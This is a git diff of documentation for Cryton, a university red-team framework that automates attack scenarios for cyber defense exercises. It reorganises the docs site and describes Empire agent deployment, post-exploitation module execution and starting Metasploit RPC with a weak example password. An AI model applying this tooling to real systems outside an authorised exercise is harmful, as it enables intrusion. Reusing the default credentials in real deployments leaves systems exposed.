Worker](https://gitlab.ics.muni.cz/cryton/cryton-worker)** packages. +**[Cryton CLI](https://gitlab.ics.muni.cz/cryton/cryton-cli){target="_blank"}**, +**[Cryton Core](https://gitlab.ics.muni.cz/cryton/cryton-core){target="_blank"}** +and **[Cryton Worker](https://gitlab.ics.muni.cz/cryton/cryton-worker){target="_blank"}** packages. It is not necessary to install this tool manually, you can use the **tester** machine. This can be done using `vagrant up tester --provision-with playbook,install-dependencies,setup-e2e-local`. **Requirements**: -- [Vagrant](https://www.vagrantup.com/) -- [Virtualbox](https://www.virtualbox.org/) -- [Ansible](https://docs.ansible.com/ansible/latest/index.html) -- [Python](https://www.python.org/) >=3.8 -- [pipenv](https://github.com/pypa/pipenv) +- [Vagrant](https://www.vagrantup.com/){target="_blank"} +- [Virtualbox](https://www.virtualbox.org/){target="_blank"} +- [Ansible](https://docs.ansible.com/ansible/latest/index.html){target="_blank"} +- [Python](https://www.python.org/){target="_blank"} >=3.8 +- [pipenv](https://github.com/pypa/pipenv){target="_blank"} Check if the requirements are met using: ```shell @@ -104,7 +104,7 @@ cd cryton-e2e ``` If you want to be able to use the Vagrant environment, clone the -*[Cryton Deploy](https://gitlab.ics.muni.cz/cryton/cryton-deploy)* project. +*[Cryton Deploy](https://gitlab.ics.muni.cz/cryton/cryton-deploy){target="_blank"}* project. ```shell git clone https://gitlab.ics.muni.cz/cryton/cryton-deploy.git ``` @@ -177,7 +177,7 @@ None for now. #### Additional requirements for advanced test 1. Worker must be able to connect to the `msfrpcd` in order to successfully use MSFListener. 2. Worker must be installed on a machine with the IP address specified in the `config.yml` file. -3. [Empire](https://github.com/BC-SECURITY/Empire) server must be running on the localhost. +3. [Empire](https://github.com/BC-SECURITY/Empire){target="_blank"} server must be running on the localhost. 4. Worker has to be able to connect to running Empire server (you have to update Worker's settings). #### Additional requirements for http_trigger test @@ -188,7 +188,7 @@ None for now. 2. Worker must be installed on a machine with the IP address specified in the `config.yml` file. #### Additional requirements for empire test -1. [Empire](https://github.com/BC-SECURITY/Empire) server must be running on the localhost. +1. [Empire](https://github.com/BC-SECURITY/Empire){target="_blank"} server must be running on the localhost. 2. Worker has to be able to connect to running Empire server (you have to update Worker's settings). ## Infrastructure @@ -197,7 +197,7 @@ The infrastructure consists of 4 machines that are used for testing. ### Tester machine The machine contains *Cryton CLI* and *Cryton E2E* tools. -Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64). +Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64){target="_blank"}. To start the machine use: ```shell @@ -207,7 +207,7 @@ vagrant up tester ### Core machine The machine contains the *Cryton Core* tool. -Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64). +Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64){target="_blank"}. To start the machine use: ```shell @@ -218,7 +218,7 @@ vagrant up core ### Worker machine The machine contains the *Cryton Worker* tool. Also hosts an empire server and Metasploit framework. -Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64). +Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64){target="_blank"}. To start the machine use: ```shell @@ -226,9 +226,9 @@ vagrant up worker ``` ### Victim machine -Machine hosts [DVWA](https://dvwa.co.uk/). +Machine hosts [DVWA](https://dvwa.co.uk/){target="_blank"}. -Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64). +Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64){target="_blank"}. To start the machine use: ```shell @@ -258,7 +258,7 @@ Some environment variables can be overridden in CLI. Try using `cryton-e2e --hel Settings description: - `CRYTON_CLI_*` - Cryton CLI environment variables' description can be found it the -**[Cryton CLI repository](https://gitlab.ics.muni.cz/cryton/cryton-cli)** +**[Cryton CLI repository](https://gitlab.ics.muni.cz/cryton/cryton-cli){target="_blank"}** - `CRYTON_E2E_CRYTON_CLI_EXECUTABLE` - (**string**) Path to the Cryton CLI executable (`/path/to/cryton-cli`) - `CRYTON_E2E_DIRECTORY` - (**string**) Path to the Cryton E2E directory (`/path/to/cryton-e2e`) diff --git a/docs/getting-started/quick-start.md b/docs/getting-started/quick-start.md new file mode 100644 index 0000000000000000000000000000000000000000..f127211a06e5ef1a459f24fc4356148cd332a60a --- /dev/null +++ b/docs/getting-started/quick-start.md @@ -0,0 +1,101 @@ +This example will allow you to quickly install the main Cryton tools using **Docker Compose**. + +??? question "Want more deployment options?" + + - [Core](../components/core.md) + - [Worker](../components/worker.md) + - [Modules](../components/modules.md) + - [CLI](../components/cli.md) + - [Frontend](../components/frontend.md) + +!!! info "System requirements" + + Please make sure you are using a system that has at least **2048 MB of RAM** and **2 CPU cores**, otherwise you might experience stability issues. + +[//]: # (TODO: make a video) + +## Installation + +!!! danger "Requirements" + + - [Git](https://git-scm.com/){target="_blank"} + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + +!!! tip "Recommendations" + + - Docker [post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - [Production deployment](../production.md) + +First, create a new directory: +```shell +mkdir cryton +cd cryton +``` + +Clone the modules: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-modules.git --branch {{{ git_release }}} +``` + +Download the .env file (settings): + +=== "curl" + + ```shell + curl -O {{{config.site_url}}}{{{ release_version }}}/getting-started/.env + ``` + +=== "wget" + + ```shell + wget {{{config.site_url}}}{{{ release_version }}}/getting-started/.env + ``` + +??? abstract "Show the .env file" + + ```ini + {! include ".env" !} + ``` + +Download the Compose configuration: + +=== "curl" + + ```shell + curl -O {{{config.site_url}}}{{{ release_version }}}/getting-started/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget {{{config.site_url}}}{{{ release_version }}}/getting-started/docker-compose.yml + ``` + +??? abstract "Show the Compose config" + + ```yaml + {! include "docker-compose.yml" !} + ``` + +Run the Compose configuration: +```shell +docker compose up -d +``` + +## Test the installation +Now we want to test if the CLI, Worker, and Core are communicating. + +Start an interactive shell in the cryton-cli container: +```shell +docker compose exec cryton_cli bash +``` + +Create (register) the Worker: +```shell +cryton-cli workers create local_worker -d "my local worker for testing" +``` + +Check if the Worker is reachable (use the **id** from the previous command): +```shell +cryton-cli workers health-check <id> +``` diff --git a/docs/getting-started/workflow.md b/docs/getting-started/workflow.md new file mode 100644 index 0000000000000000000000000000000000000000..1b9f01ce42fb76f332a4b935627dc51f6c7c107f --- /dev/null +++ b/docs/getting-started/workflow.md @@ -0,0 +1,45 @@ +The following is the ideal sequence of steps to use when you are planning an attack and using Cryton to automate it. + +## Deployment +First, you need to prepare an infrastructure for your cyber defense exercise. Deploying the Cryton toolset should be part of it: + +1. Install and set up [Core](../components/core.md) +2. Install [CLI](../components/cli.md) and [Frontend](../components/frontend.md) +3. Install and set up your [Worker(s)](../components/worker.md) +4. Make sure it works: + - Core is up and running + - CLI/Frontend can access Core's REST API + - Worker(s) are up and running + - Worker(s) are connected to the RabbitMQ server + +Once the Cryton tools are deployed, you can start planning your attack. + +!!! tip "Tips" + + - CLI and Frontend can be deployed outside the infrastructure since other components don't need access to them + - Use one worker per team infrastructure + +!!! note "" + + This section can be represented by the [quick-start](quick-start.md) guide. + +## Attack planning +Every Run can be described by a simple formula: +``` +plan template + inventory = Plan instance +Plan instance + Worker = Plan execution +Plan instance + Workers = Run +``` + +Which results in the following steps: + +1. Choose or design a plan template +2. Create a Plan instance +3. Register the Worker(s) +4. Create a Run +5. Schedule or execute the Run +6. Get the Run Report + +!!! note "" + + More information about this section can be found in the [execution example](execution-example.md). diff --git a/docs/2022.2/images/cryton-architecture.png b/docs/images/cryton-architecture.png similarity index 100% rename from docs/2022.2/images/cryton-architecture.png rename to docs/images/cryton-architecture.png diff --git a/docs/2022.2/images/design-plan.png b/docs/images/design-plan.png similarity index 100% rename from docs/2022.2/images/design-plan.png rename to docs/images/design-plan.png diff --git a/docs/2022.2/images/design-stage.png b/docs/images/design-stage.png similarity index 100% rename from docs/2022.2/images/design-stage.png rename to docs/images/design-stage.png diff --git a/docs/2022.2/images/design-template.png b/docs/images/design-template.png similarity index 100% rename from docs/2022.2/images/design-template.png rename to docs/images/design-template.png diff --git a/docs/images/gitlab-download.png b/docs/images/gitlab-download.png new file mode 100644 index 0000000000000000000000000000000000000000..e5c954abad365b19e3322ace81355a55acc942e3 Binary files /dev/null and b/docs/images/gitlab-download.png differ diff --git a/docs/2022.2/images/redoc-preview.png b/docs/images/redoc-preview.png similarity index 100% rename from docs/2022.2/images/redoc-preview.png rename to docs/images/redoc-preview.png diff --git a/docs/2022.2/images/states-plan.png b/docs/images/states-plan.png similarity index 100% rename from docs/2022.2/images/states-plan.png rename to docs/images/states-plan.png diff --git a/docs/2022.2/images/states-run.png b/docs/images/states-run.png similarity index 100% rename from docs/2022.2/images/states-run.png rename to docs/images/states-run.png diff --git a/docs/2022.2/images/states-stage.png b/docs/images/states-stage.png similarity index 100% rename from docs/2022.2/images/states-stage.png rename to docs/images/states-stage.png diff --git a/docs/2022.2/images/states-step.png b/docs/images/states-step.png similarity index 100% rename from docs/2022.2/images/states-step.png rename to docs/images/states-step.png diff --git a/docs/2022.2/images/swagger-preview.png b/docs/images/swagger-preview.png similarity index 100% rename from docs/2022.2/images/swagger-preview.png rename to docs/images/swagger-preview.png diff --git a/docs/index.md b/docs/index.md index b632ae0cb4da42b8c5775260bbd21506d126facb..12a591317d2bfb1ddd7ba0c3cbe1e834518cf8aa 100644 --- a/docs/index.md +++ b/docs/index.md @@ -1,22 +1,23 @@ -## About Cryton -Cryton is a Cron-like red team framework for complex attack scenarios automation and scheduling. Through the usage of Core, +Cryton toolset is a Cron-like red team framework for complex attack scenarios automation and scheduling. Through the usage of Core, Worker, and attack modules it provides ways to plan, execute and evaluate multistep attacks. -All of its open-source components [can be found here](https://gitlab.ics.muni.cz/cryton). +???+ question "Are there any other usages?" -The lifecycle of the Attack scenario in the Cryton context can be seen in the following picture: - + - Breach & attack emulation + - Automation of penetration testing and infrastructure scanning + - Scheduler or executor across multiple environments + +!!! tip "No time to read?" + + Check out the [quick-start](getting-started/quick-start.md) guide. -With Cryton you can: +The lifecycle of the attack scenario in the Cryton context can be seen in the following picture: + -* Design an attack **Template** -* Create an **Instance** -* Schedule (or directly Execute) a **Run** -* Generate a **Report** -* Evaluate results +All of its open-source components [can be found here](https://gitlab.ics.muni.cz/cryton){target="_blank"}. ## Purpose -The purpose of the Cryton tool is **to execute complex attack scenarios, in which the system under test is known in advance**. +The main purpose of the Cryton is **to execute complex attack scenarios, in which the system under test is known in advance**. It was designed as such to assist red teams in cybersecurity exercises in means of repeatability of certain attack scenarios. These scenarios are often prepared in advance and reflect vulnerabilities hidden in the blue team's infrastructure. @@ -28,63 +29,19 @@ do that effectively? This is where Cryton comes to play. If you know all the vulnerabilities in the trainees' system - and you do - you can prepare an attack scenario to check if they are still available and working after the fix. Cryton will execute the plan against -all targets you tell it to and then generate reports (human and machine process-able). You can then not only see, which +all targets you tell it to and then generate reports (human and machine-readable). You can then not only see, which attack steps did succeed on which system, but also score your trainees based on these results. With this in mind, you should not expect Cryton to be some kind of evil artificial intelligence capable of taking over the -world. It is simply a scheduler for python modules. Scheduler which executes these modules according to some execution +world. It is simply a scheduler for python modules. The scheduler executes these modules according to some execution tree with conditions based on each step of the scenario. Each module is a script orchestrating some well-known attack tools, but that is it. ## Support -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**, however it **should** be possible to +Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. However, it **should** be possible to use it everywhere if the requirements are met. Please keep in mind that **only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. -More detailed information can be found in each release's documentation or each project's README. - -## Technological decisions -The next section tries to explain the choices for currently employed technologies. Please take into account that these -technologies are not supposed to be final and unchangeable. They just appeared to be best suited for the task at the -time of development, they may change in the future. - -### APScheduler -This was the first choice made for the scheduler module. It allows you to time your python function to be scheduler on -a specific time or day or even interval. It is pretty lightweight and does not need much in terms of resources or -capacity. So far I have not found anything better suited for the task. There is though one small problem with running -it as a service, but there are ways around it. - -### Django ORM -In the beginning, Cryton used the SQLite database with direct access. That changed as SQLite is not good with scaling -for the future. The second choice was PostgreSQL, which stayed to this day, but it was updated with the use of Django ORM. -Using the Django REST framework for the REST interface also emerged from this choice. - -### Rabbit MQ -For developing Master-Worker architecture, where you can issue commands remotely, we needed some kind of RPC. Although, -as experience showed us, we also needed it to be asynchronous. That's why we chose a messaging system Rabbit MQ. - -### Metasploit -I guess everyone in the IT security field has heard about the Metasploit framework. It is one of the most complete and usable -open-source attack tools available. Of course, Cryton uses it for some attack modules - the majority of simulated attacks -in CDXs usually do use Metasploit in some way. But its attacking capabilities are not the only reason to use it. Its -real advantage is Metasploit's session management. Every time you open a session to some machine it stores it under -a specific ID which you can later use to communicate with the target. This is one of the main features you can use while -executing your attack scenario in Cryton. - -### Empire -For post-exploitation attacks, we decided to add support for an open-source project called Empire. Empire is -a post-exploitation framework that includes pure-PowerShell Windows agents, Python 3 Linux/OS X agents, and C# agents. -The framework offers cryptological-secure communications and flexible architecture. This is done via asynchronous -communication between our Worker component and an Empire c2 server. - -### Docker (compose) -To bundle everything together and make the deployment effortless, we use docker-compose. +!!! note "" -## Authors -| Surname | Name | Role | -|---------|--------|-------------------------| -| Boháček | Milan | Python developer | -| Drobňák | Michal | Frontend developer | -| Nutár | Ivo | Technical leader | -| Rája | Jiří | Senior Python developer | -| Tomči | Andrej | Senior Python developer | + The Docker images should render the support limitations irrelevant. diff --git a/docs/2022.2/integrated-tools/empire.md b/docs/integrated-tools/empire.md similarity index 84% rename from docs/2022.2/integrated-tools/empire.md rename to docs/integrated-tools/empire.md index 62c39e976c5d32aee2339c735706fec1f50ee1ec..48fe637bb1c13379b9227a99056e9b0cb2657d28 100644 --- a/docs/2022.2/integrated-tools/empire.md +++ b/docs/integrated-tools/empire.md @@ -1,4 +1,4 @@ -Description of [Empire](https://github.com/BC-SECURITY/Empire) functionalities supported by Cryton. +Description of [Empire](https://github.com/BC-SECURITY/Empire){target="_blank"} functionalities supported by Cryton. **functionalities:** <ol> @@ -8,9 +8,9 @@ Description of [Empire](https://github.com/BC-SECURITY/Empire) functionalities s ## requirements for usage with Core: - Installed and running Empire server with version 4.1.0 and above. Installation guide -[here](https://bc-security.gitbook.io/empire-wiki/quickstart/installation) -- Installed all main Cryton components, that is [Core](../starting-point/core.md), [Worker](../starting-point/worker.md) and -[Cli](../starting-point/cli.md) +[here](https://bc-security.gitbook.io/empire-wiki/quickstart/installation){target="_blank"} +- Installed all main Cryton components, that is [Core](../components/core.md), [Worker](../components/worker.md) and +[Cli](../components/cli.md) - Empire server needs to be able to communicate with Worker component **For Empire usage only with Worker see documentation [here](../interfaces/worker-rabbit-api.md#rabbit-api).** @@ -25,19 +25,19 @@ This functionality uses `step_type: empire/agent-deploy` and enables to deploy E **Usable arguments for this step type are:** -| Argument | Description | -|-----------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `listener_name` | Name of listener in Empire for identification. If listener with this name already exists in Empire, it will be used for stager generation. | -| `listener_port`<br>(optional) | Port on which should be listener communicating with Agents. | -| `listener_options`<br>(optional) | Additional adjustable parameters for creating listener. More on [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/listeners). | -| `listener_type`<br>(optional) | Type of listener (default: http). | -| `stager_type` | Type of stager that should be generated in form of path (example: `multi/bash'). For stager types look [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/stagers). | -| `stager_options`<br>(optional) | Additional adjustable parameters for generating stager. Parameters can be viewed in individual stager python files or through Empire client. | -| `agent_name` | Name for the deployed agent which is going to be used as a reference to this agent later. | -| `use_named_session`<br>(optional) | Name of created msf session through Cryton. | -| `use_any_session_to_target`<br>(optional) | Ip address of target on which has been created msf session | -| `session_id`<br>(optional) | ID of msf session to target. | -| [`ssh_connection`](#arguments-for-ssh_connection)<br>(optional) | Arguments for creating ssh connection to target. | +| Argument | Description | +|-----------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `listener_name` | Name of listener in Empire for identification. If listener with this name already exists in Empire, it will be used for stager generation. | +| `listener_port`<br>(optional) | Port on which should be listener communicating with Agents. | +| `listener_options`<br>(optional) | Additional adjustable parameters for creating listener. More on [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/listeners){target="_blank"}. | +| `listener_type`<br>(optional) | Type of listener (default: http). | +| `stager_type` | Type of stager that should be generated in form of path (example: `multi/bash'). For stager types look [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/stagers){target="_blank"}. | +| `stager_options`<br>(optional) | Additional adjustable parameters for generating stager. Parameters can be viewed in individual stager python files or through Empire client. | +| `agent_name` | Name for the deployed agent which is going to be used as a reference to this agent later. | +| `use_named_session`<br>(optional) | Name of created msf session through Cryton. | +| `use_any_session_to_target`<br>(optional) | Ip address of target on which has been created msf session | +| `session_id`<br>(optional) | ID of msf session to target. | +| [`ssh_connection`](#arguments-for-ssh_connection)<br>(optional) | Arguments for creating ssh connection to target. | ### Arguments for `ssh_connection` @@ -72,11 +72,11 @@ This functionality uses `step_type: empire/execute` and allows the execution of **To execute an Empire module use the following arguments:** -| Argument | Description | -|----------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `use_agent` | Name of an active agent that checked on Empire server. | -| `module` | Name of Empire module in form of a path that should be executed on the active agent (example: `collection/sniffer`). Available Empire modules [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules). | -| `module_arguments`<br>(optional) | Additional arguments for Empire module execution. | +| Argument | Description | +|----------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `use_agent` | Name of an active agent that checked on Empire server. | +| `module` | Name of Empire module in form of a path that should be executed on the active agent (example: `collection/sniffer`). Available Empire modules [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules){target="_blank"}. | +| `module_arguments`<br>(optional) | Additional arguments for Empire module execution. | ### Example diff --git a/docs/2022.2/integrated-tools/metasploit.md b/docs/integrated-tools/metasploit.md similarity index 73% rename from docs/2022.2/integrated-tools/metasploit.md rename to docs/integrated-tools/metasploit.md index 34b785e434a9ec01f52c9d6df047bf19ef76700d..9ecd002456070ce71d3a3e4a77d9174f4c474dbb 100644 --- a/docs/2022.2/integrated-tools/metasploit.md +++ b/docs/integrated-tools/metasploit.md @@ -1,13 +1,23 @@ -Description of [Metasploit](https://github.com/rapid7/metasploit-framework) functionalities supported by Cryton. +Description of [Metasploit](https://github.com/rapid7/metasploit-framework){target="_blank"} functionalities supported by Cryton. ## Setup To be able to use MSF, it must be accessible to the Worker. All you need to do is start the msfrpc(d) module in MSF and set Worker's environment `CRYTON_WORKER_MSFRPCD_*` variables. After that, if you start the Worker and a connection is created, you will see the following message: `Connected to msfrpcd.`. +### Start MSFRPC + +``` +load msgrpc ServerHost=127.0.0.1 ServerPort=55553 User=msf Pass='toor' SSL=true +``` + +``` +msfrpcd -P toor +``` + ## Session management Cryton allows you to utilize sessions from Metasploit. To learn how, see -[session management](../designing-phase/session-management.md). +[session management](../designing-phase/step.md#session-management). ## MSF listener Cryton allows creating a Stage that will start an MSF listener on Worker and will wait until it returns a session that matches diff --git a/docs/2022.2/interfaces/cli.md b/docs/interfaces/cli.md similarity index 97% rename from docs/2022.2/interfaces/cli.md rename to docs/interfaces/cli.md index 125876bf9822573f480a2b61ee9a39c119a5e35c..1dcbc4a2598a01c12f73cb5cdb0b9e5e1f66a9f1 100644 --- a/docs/2022.2/interfaces/cli.md +++ b/docs/interfaces/cli.md @@ -1,6 +1,5 @@ CLI implements capabilities of the Cryton's REST API and can be automated by using custom scripts. -To start the CLI just type `cryton-cli` and the following help page should show: ``` Usage: cryton-cli [OPTIONS] COMMAND [ARGS]... @@ -28,19 +27,6 @@ Commands: workers Manage Workers from here. ``` -The default Cryton's REST API address and port are **localhost** and **8000**. To override this use `-H` and `-p` options. -Optionally use the `--secure` flag to use the *HTTPS* protocol or the `--debug` flag for non-formatted output. -``` -cryton-cli -H 127.0.0.1 -p 8000 --secure --debug <your command> -``` - -To learn about each command's options use: -``` -cryton-cli <your command> --help -``` - -For a better understanding of the results, we highlight the successful ones with **green** and the others with **red**. - ## execution-variables Manage Execution variables from here. diff --git a/docs/2022.2/interfaces/core-rest-api.md b/docs/interfaces/core-rest-api.md similarity index 98% rename from docs/2022.2/interfaces/core-rest-api.md rename to docs/interfaces/core-rest-api.md index b2fbab57d4f61b5ba46904ada1231d8bfa386195..5c88656f8baa19fc495359d945de21bfd18f3b96 100644 --- a/docs/2022.2/interfaces/core-rest-api.md +++ b/docs/interfaces/core-rest-api.md @@ -1,19 +1,20 @@ This document provides documentation of the Cryton REST API endpoints. -It was automatically generated from Swagger via the [swagger-markdown](https://www.npmjs.com/package/swagger-markdown) tool. -If you are interested in Swagger interactive documentation, open the Cryton REST API or browse to the `/doc` endpoint. -For example: `<cryton_rest_api_address>:<cryton_rest_api_port>` or `<cryton_rest_api_address>:<cryton_rest_api_port>/doc`. +If you are interested in the Swagger interactive documentation, open the Cryton REST API or browse to the `/doc` endpoint. +For example: [http://127.0.0.1:8000/doc/](http://127.0.0.1:8000/doc/){target="_blank"}.  -If you are interested in Redoc interactive documentation, browse to the `/redoc` endpoint on Cryton REST API. -For example: `<cryton_rest_api_address>:<cryton_rest_api_port>/redoc`. +If you are interested in the Redoc interactive documentation, browse to the `/redoc` endpoint on Cryton REST API. +For example: [http://127.0.0.1:8000/redoc/](http://127.0.0.1:8000/redoc/){target="_blank"}. - + + +!!! danger "" -**Notice:** Uploaded byte files must be encoded using UTF-8. + Uploaded byte files must be encoded using UTF-8. -## Version: 1.0.0 +## API ### /api/execution_variables/ diff --git a/docs/2022.2/interfaces/frontend.md b/docs/interfaces/frontend.md similarity index 100% rename from docs/2022.2/interfaces/frontend.md rename to docs/interfaces/frontend.md diff --git a/docs/2022.2/interfaces/worker-rabbit-api.md b/docs/interfaces/worker-rabbit-api.md similarity index 96% rename from docs/2022.2/interfaces/worker-rabbit-api.md rename to docs/interfaces/worker-rabbit-api.md index 39a05075a521a40b8fbe24f20487b2af0b5f0180..6c6a4f078680eb795fc1a218b520a7a10ccc9ded 100644 --- a/docs/2022.2/interfaces/worker-rabbit-api.md +++ b/docs/interfaces/worker-rabbit-api.md @@ -1,5 +1,4 @@ -It is possible to use Cryton Worker as a standalone application and control it using your own requests. -Worker utilizes [RabbitMQ](https://www.rabbitmq.com/) as it's messaging protocol for asynchronous RPC. +Worker utilizes [RabbitMQ](https://www.rabbitmq.com/){target="_blank"} as it's messaging protocol for asynchronous RPC. ## Rabbit API Worker is able to process any request sent through RabbitMQ to its Queues (`cryton_worker.WORKER_NAME.attack.request`, diff --git a/docs/license.md b/docs/license.md index 208b3d0cbc0a9eeb574efdd417a5ca97da4b3bad..29f85aaf09ed91e7f6d3df0a1de3a4617922c690 100644 --- a/docs/license.md +++ b/docs/license.md @@ -1,7 +1,7 @@ Cryton is open-source software developed by **Masaryk University**, and distributed under **MIT license**. ## License Terms -**Copyright 2022 MASARYK UNIVERSITY** +**Copyright 2023 MASARYK UNIVERSITY** Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: diff --git a/docs/logging.md b/docs/logging.md new file mode 100644 index 0000000000000000000000000000000000000000..7b1cbbe1fa255745487af70176a9f43ce9d28271 --- /dev/null +++ b/docs/logging.md @@ -0,0 +1,47 @@ +The logs adhere to the following format: +``` +{"queue": "cryton_core.control.request", "event": "Queue declared and consuming", "logger": "cryton-debug", "level": "info", "timestamp": "2021-05-18T11:19:20.012152Z"} +{"plan_name": "Example scenario", "plan_id": 129, "status": "success", "event": "plan created", "logger": "cryton", "level": "info", "timestamp": "2021-05-18T06:17:39.753017Z"} +``` + +Logs are stored in the app directory, which can be found at `~/.local/cryton_<app>`. +In case you're running the app in a Docker container the logs will be saved inside the container. + +## Core +Every change of state is logged for later analysis. Every Step the result is also logged, although +the output is not. It can be found in the database. + +You can switch between the debug and the production loggers using the environment variable *CRYTON_CORE_DEBUG*. +To run tests, we use a testing logger to avoid saving unwanted logs. + +**Production** (`cryton-core`) + +- RotatingFileHandler (*CRYTON_CORE_APP_DIRECTORY*/log/cryton-core.log) + +**Debug** (`cryton-core-debug`) + +- RotatingFileHandler (*CRYTON_CORE_APP_DIRECTORY*/log/cryton-core-debug.log) +- Console (std_out) + +**Testing** (`cryton-core-test`) + +- Console (std_out) + +## Worker +Each request and its processing are logged for later analysis. + +You can switch between the debug and the production loggers using the environment variable *CRYTON_WORKER_DEBUG*. +To run tests, we use a testing logger to avoid saving unwanted logs. + +**Production** (`cryton-worker`) + +- RotatingFileHandler (*CRYTON_WORKER_APP_DIRECTORY*/log/cryton-worker.log) + +**Debug** (`cryton-worker-debug`) + +- RotatingFileHandler (*CRYTON_WORKER_APP_DIRECTORY*/log/cryton-worker-debug.log) +- Console (std_out) + +**Testing** (`cryton-worker-test`) + +- Console (std_out) diff --git a/docs/production.md b/docs/production.md new file mode 100644 index 0000000000000000000000000000000000000000..59efd3895b23fdbe4c36a67dd8c18318e3673f66 --- /dev/null +++ b/docs/production.md @@ -0,0 +1,26 @@ +There are some rules you should follow when deploying Cryton to a production environment. + +## Core +### Settings +Update these settings to not use the default values + +- CRYTON_CORE_RABBIT_PASSWORD +- CRYTON_CORE_DB_PASSWORD +- CRYTON_CORE_API_SECRET_KEY + +### Proxy +Hide the rest API behind a proxy with restricted access. + +!!! tip + + Use the officially supplied docker-compose.yml and add a .htaccess file to it. + +## Worker +### Settings +Update these settings to not use the default values + +- CRYTON_WORKER_NAME +- CRYTON_WORKER_MODULES_DIR +- CRYTON_WORKER_MSFRPCD_PASSWORD +- CRYTON_WORKER_RABBIT_PASSWORD +- CRYTON_WORKER_EMPIRE_PASSWORD diff --git a/mkdocs.yml b/mkdocs.yml index 33ecb9eb29673dbaf760d2c1ae7ae5fd49cb547f..e67bebabb72e4684274ae2b26a96a57854fc55ee 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -1,63 +1,108 @@ site_name: Cryton toolset site_url: https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/ +repo_url: https://gitlab.ics.muni.cz/cryton theme: name: material locale: en custom_dir: docs/overrides palette: - primary: indigo + - scheme: slate + primary: indigo + accent: indigo + toggle: + icon: material/brightness-4 + name: Switch to light mode + - scheme: default + primary: indigo + accent: indigo + toggle: + icon: material/brightness-7 + name: Switch to dark mode + + features: + - content.tabs.link # Linked code tabs + - content.code.copy # Code copy button + - navigation.tracking # Anchor tracking + - navigation.top # Back-to-top button + - search.highlight # Highlight searched terms + - toc.follow extra: version: provider: mike +markdown_extensions: + - pymdownx.superfences: + custom_fences: + - name: mermaid + class: mermaid + format: !!python/name:pymdownx.superfences.fence_code_format + - pymdownx.tabbed: + alternate_style: true + - toc: + permalink: true + - admonition + - pymdownx.details + - attr_list + +plugins: + - search: + lang: en + - macros: + j2_block_start_string: "{{{%" + j2_block_end_string: "%}}}" + j2_variable_start_string: "{{{" + j2_variable_end_string: "}}}" + include_yaml: + - docs/extra/variables.yml + on_error_fail: true + - include-markdown: + opening_tag: "{!" + closing_tag: "!}" + nav: - - Home: index.md - - Architecture: 2022.2/architecture.md - - Starting point: - - Core: 2022.2/starting-point/core.md - - Worker: 2022.2/starting-point/worker.md - - Modules: 2022.2/starting-point/modules.md - - CLI: 2022.2/starting-point/cli.md - - Frontend: 2022.2/starting-point/frontend.md - - Deployment with Ansible: 2022.2/starting-point/ansible.md - - Testing environment: 2022.2/starting-point/testing-environment.md + - Introduction: index.md + - Architecture: architecture.md - Getting started: - - Local deployment: 2022.2/getting-started/installation-example.md - - Simple Workflow: 2022.2/getting-started/workflow-example.md + - Quick-start: getting-started/quick-start.md + - Workflow: getting-started/workflow.md + - Execution example: getting-started/execution-example.md +# - Deployment with Ansible: getting-started/ansible.md +# - Testing environment: getting-started/playground.md + - Components: + - Core: components/core.md + - Worker: components/worker.md + - Modules: components/modules.md + - CLI: components/cli.md + - Frontend: components/frontend.md - Designing phase: - - What is an attack scenario: 2022.2/designing-phase/what-is-attack-scenario.md - - Template: - - What is a template: 2022.2/designing-phase/template.md - - Plan: 2022.2/designing-phase/plan.md - - Stage: 2022.2/designing-phase/stage.md - - Step: 2022.2/designing-phase/step.md - - Plan instance: 2022.2/designing-phase/plan-instance.md - - Session management: 2022.2/designing-phase/session-management.md + - Template (attack scenario): designing-phase/template.md + - Plan: designing-phase/plan.md + - Stage: designing-phase/stage.md + - Step: designing-phase/step.md + - Plan instance: designing-phase/plan-instance.md - Execution phase: - - What is Run: 2022.2/execution-phase/run.md - - Execution statistics: 2022.2/execution-phase/execution.md - - Reporting: 2022.2/execution-phase/reporting.md + - What is Run: execution-phase/run.md + - Execution statistics: execution-phase/execution.md + - Reporting: execution-phase/reporting.md - Interfaces: - - CLI: 2022.2/interfaces/cli.md - - Frontend: 2022.2/interfaces/frontend.md - - Core (REST API): 2022.2/interfaces/core-rest-api.md - - Worker (Rabbit API): 2022.2/interfaces/worker-rabbit-api.md - - Attack modules: - - How to create an attack module: 2022.2/modules/howto-create-attack-modules.md - - Modules: - - mod_cmd: 2022.2/modules/mod_cmd.md - - mod_medusa: 2022.2/modules/mod_medusa.md - - mod_msf: 2022.2/modules/mod_msf.md - - mod_nmap: 2022.2/modules/mod_nmap.md - - mod_script: 2022.2/modules/mod_script.md - - mod_wpscan: 2022.2/modules/mod_wpscan.md + - 